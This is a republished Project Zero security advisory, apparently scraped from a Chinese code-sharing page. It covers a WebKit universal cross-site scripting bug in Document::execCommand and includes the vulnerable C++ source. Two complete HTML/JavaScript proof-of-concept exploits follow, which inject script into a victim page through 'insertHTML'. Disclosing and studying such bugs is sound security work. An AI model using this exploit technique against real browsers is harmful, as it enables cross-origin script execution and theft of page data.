扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 |
<!-- VULNERABILITY DETAILS </code><code> static Editor::Command command(Document* document, const String& commandName, bool userInterface = false) { RefPtr<Frame> frame = document->frame(); if (!frame || frame->document() != document) // ***1*** return Editor::Command(); document->updateStyleIfNeeded(); // ***2*** return frame->editor().command(commandName, userInterface ? CommandFromDOMWithUserInterface : CommandFromDOM); } bool Document::execCommand(const String& commandName, bool userInterface, const String& value) { EventQueueScope eventQueueScope; return command(this, commandName, userInterface).execute(value); } </code><code> This bug is similar to https://bugs.chromium.org/p/project-zero/issues/detail?id=1133. <code>command calls <code>updateStyleIfNeeded</code>[2], which might trigger JavaScript execution, e.g., via HTMLObjectElement::updateWidget</code>. If the JS code triggers a new page load, the editor command will be applied to the wrong page. The method checks that the <code>document</code> argument is the document that's currently displayed on the page, but it does so *before* the <code>updateStyleIfNeeded</code> call. An attacker can exploit this bug to execute the "InsertHTML" command and run JavaScript in the context of the victim page. VERSION WebKit revision 246194 Safari version 12.1.1 (14607.2.6.1.1) REPRODUCTION CASE The test case requires the victim page to have a selected element when the load is complete. A common suitable case is when the page contains an autofocused <input> element. </code><code> <body> <script> function createURL(data, type = 'text/html') { return URL.createObjectURL(new Blob([data], {type: type})); } function waitForLoad() { showModalDialog(createURL( <script> let it = setInterval(() => { try { opener.w.document.x; } catch (e) { clearInterval(it); window.close(); } }, 100); </scrip<code> + 't>')); } victim_url = 'https://trac.webkit.org/search'; cache_frame = document.body.appendChild(document.createElement('iframe')); cache_frame.src = victim_url; cache_frame.style.display = 'none'; onclick = () => { w = open(); obj = document.createElement('object'); obj.data = 'about:blank'; obj.addEventListener('load', function() { a = w.document.createElement('a'); a.href = victim_url; a.click(); waitForLoad(); }); w.document.body.appendChild(obj); w.document.execCommand('insertHTML', false, '<iframe onload="alert(document.documentElement.outerHTML)" src="about:blank"></iframe>'); } </script> </body> </code><code> repro_iframe.html contains a version that uses an <iframe> instead of a new window and works in Safari 12.1.1. CREDIT INFORMATION Sergei Glazunov of Google Project Zero --> <body> <script> function createURL(data, type = 'text/html') { return URL.createObjectURL(new Blob([data], {type: type})); } function waitForLoad() { showModalDialog(createURL(<code> <script> let it = setInterval(() => { try { opener.w.document.x; } catch (e) { clearInterval(it); window.close(); } }, 100); </scrip</code> + 't>')); } victim_url = 'data:text/html,<h1>secret data</h1><input autofocus>'; cache_frame = document.body.appendChild(document.createElement('iframe')); cache_frame.src = victim_url; cache_frame.style.display = 'none'; victim_frame = document.body.appendChild(document.createElement('iframe')); victim_frame.style.width = victim_frame.style.height = '100%'; victim_frame.contentDocument.write('<h1>click to start</h1>'); victim_frame.contentWindow.onclick = (() => { obj = document.createElement('object'); obj.data = 'about:blank'; obj.addEventListener('load', function() { a = victim_frame.contentDocument.createElement('a'); a.href = victim_url; a.click(); waitForLoad(); }); victim_frame.contentDocument.body.appendChild(obj); victim_frame.contentDocument.execCommand('insertHTML', false, '<iframe onload="alert(document.firstChild.outerHTML)" src="about:blank"></iframe>'); }); </script> </body> |
体验盒子
